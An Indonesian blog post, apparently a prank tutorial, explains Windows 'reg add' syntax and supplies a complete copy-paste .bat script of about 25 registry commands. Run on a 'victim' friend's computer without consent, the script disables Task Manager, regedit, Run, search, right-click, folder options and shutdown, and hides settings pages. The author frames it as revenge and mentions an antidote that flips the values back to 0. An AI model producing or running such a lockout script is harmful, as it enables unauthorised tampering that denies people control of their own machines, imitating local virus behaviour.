Gini ceritanya, teman gue itu terkenal soak tau dan pelit ilmu, ampe-ampe untuk minjem computer aja ga boleh bahkan klo tho boleh pasti dilihatain, wkkkkkkk
Kemunculan ide………..
Yah berawal dari rasa dongkol dihati makanya gue pulang dan punya rencana tuk kerjain tuh teman…..dengan bermodal program text editor (notepad) dan sedikit pengetahuan tentang stuktur registry
Langkah pertama :
Buka notepad dan siap bongkar isi otak….cari tentang registry, sebetulnya hal ini terilhami oleh olah kebanyakan virus local yang bikin jengkel, seperti blokir registry (regedit) blokir CMD, Blokir Folder Option dan lain lain. Cara paling praktis tuh dengan akses registry lewat cmd…wuih nehh mah artikel jadul, tp ga papalah…….
Cara akses dan bahkan menyuntikan key ke registry. Sebeltulnya perintah2 dalam cmd dapat kita buat script program sederhana yaitu dengan mengkompile menjadi file bat…..klo itu dijelaskan nanti di akhir aja……..
Berikut ini daftar key diregisrty yang kan kita buat
NoDispCPL = sembunyiin Pengaturan display properti
NoDispAppearancePage = sembunyiin Pengaturan thema
NoDispScrSavPage = sembunyiin Pengaturan screen saver
NoDispSettingsPage = sembunyiin Pengaturan display property (desk.cpl)
NoNetSetup = sembunyiin Pengaturan Network
NoAdminPage = sembunyiin halaman Admin
NoProfilePage = sembunyiin halaman user account
NoPwdPage = sembunyiin Halaman password user account
NoFolderOptions = sembunyiin Folder Option
DisableRegistryTools = Blokir registry
NoRun = Blokir RUN
DisableTaskMgr = Blokir Task manager
NoFind = Blokir Search
NoDevMgrPage = sembunyiin Pengaturan device manager
NoViewContextMenu = Blokir Klik kanan (gak bias klik kanan)
NoPrinterTab = sembunyiin Printer
NoDesktop = sembunyiin Pengaturan display properti
NoClose = sembunyiin Tombol shutdown
Nah itu daftar2 taget serangan di registry…..wkkkkkkkkkkkk dah muali punya pikiran criminal nehhh
Nah kita minta bantuan help di cmd dengan cara buka cmd lalu ketik reg add /?
Maka muncuk kayak gini neh
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
KeyName [\\Machine\]FullKey
Machine Name of remote machine - omitting defaults to the current
machine Only HKLM and HKU are available on remote machines
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY
/v The value name, under the selected Key, to add
/ve adds an empty value name
/t RegKey data types
[ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN |
REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN |
REG_NONE | REG_EXPAND_SZ ]
If omitted, REG_SZ is assumed
/s Specify one charactor that you use as the separator in your data
string for REG_MULTI_SZ. If omitted, use "\0" as the separator
/d The data to assign to the registry ValueName being added
/f Force overwriting the existing registry entry without prompt
Examples:
REG ADD \\ABC\HKLM\Software\MyCo
Adds a key HKLM\Software\MyCo on remote machine ABC
REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
Adds a value (name: Data, type: REG_BINARY, data: fe340ead)
REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
Adds a value (name: MRU, type: REG_MUTLI_SZ, data: fax\0mail\0\0)
REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
Notice: Use the double percentage ( %% ) inside the expand string
Nah kita jelaskan atu2:
Perintah reg add digunakan untuk menambah key di registry
Dengan syntak nya kurang lebih sperti ini
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
Pada key name adalalah struktur key dlam registry
HKLM iyu sama dengan HKey_Local_Machine
HKCU sama dengan HKey_Curent_User
HKU sama dengan HKey_User
HKCC sama dengan HKey_Curent_Config
Dan bla-bla-bala
Trus parameter switch
/v Value atau nilai yang kan kita buat
/ve Nilai kosong
/t Tipe Data pada RegKey
Macamnya
REG_SZ,
REG_MULTI_SZ
REG_DWORD_BIG_ENDIAN
REG_DWORD
REG_BINARY
REG_DWORD_LITTLE_ENDIAN
REG_NONE | REG_EXPAND_SZ ]
/s Menspesifikan karakter yang digunakan untuk sparator data string untuk REG_MULTI_SZ. Dan bias dikesampingkan dengan menggunakan "\0" sebagai separator
/d Data yang kan kita masukan atau ValueName yang kan ditambah
/f Paksa untuk overwrite data yang sudah ada
Langsung aja
Untuk lakukan prosedur itu, kita tanamkam data yang akan kita tambahkan, sebagai contoh untuk NoDispCPL = sembunyiin Pengaturan display properti
Value NoDispCPL kita tamankan pada key
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
Sehingga kita mendapatkan syntak script
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
Artinya : kita akan menambah key pada HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System sebuah value dengan nama NoDispCPL dengan tipe (t) REG_DWORD dan memasukan nilai data(d) 1 (1=enable 0 = disable) denga modus paksa (f)
Itu syntak yang kiat tuliskan
Gampang khan,? Kita tinggal copy syntak tsb
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
Ke notepad dan simpan dengan aturan Save as >save as type (pilih all files) dan file name = xxxx.bat(lihat ekstensi .bat) atau kamu bias kasih nama sendiri asalkan ekstensi harus .bat
Jadi script lengkapnya ini
Kopi kode Sesudah tanda bintang
***************
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispAppearancePage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispBackgroundPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispScrSavPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispSettingsPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoNetSetup /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoSecCPL /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoAdminPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoProfilePage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoPwdPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoConfigPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoFileSystemPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoRun /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDevMgrPage /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoPrinterTab /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDeletePrinter /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoAddPrinter /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
*********akhiri sebelum tanda bintang ***********
Klo udah kita jalankan file bat di computer korban……..eh tapi jgn lupa untuk membuat penawarnya dengan cara ubah script diatas pada nilai 1 menjadi 0
Contoh
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
Menjadi
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 0 /f
dan lihat hsailnya kawan kamu bakal uring2an coz kompi dia gak bisa dimatiin, ga ada klik kanan dan bla bla bla
Otre sekian dulu silahkan modifikasi sendiri
Lihat Juga
Tidak ada komentar:
Posting Komentar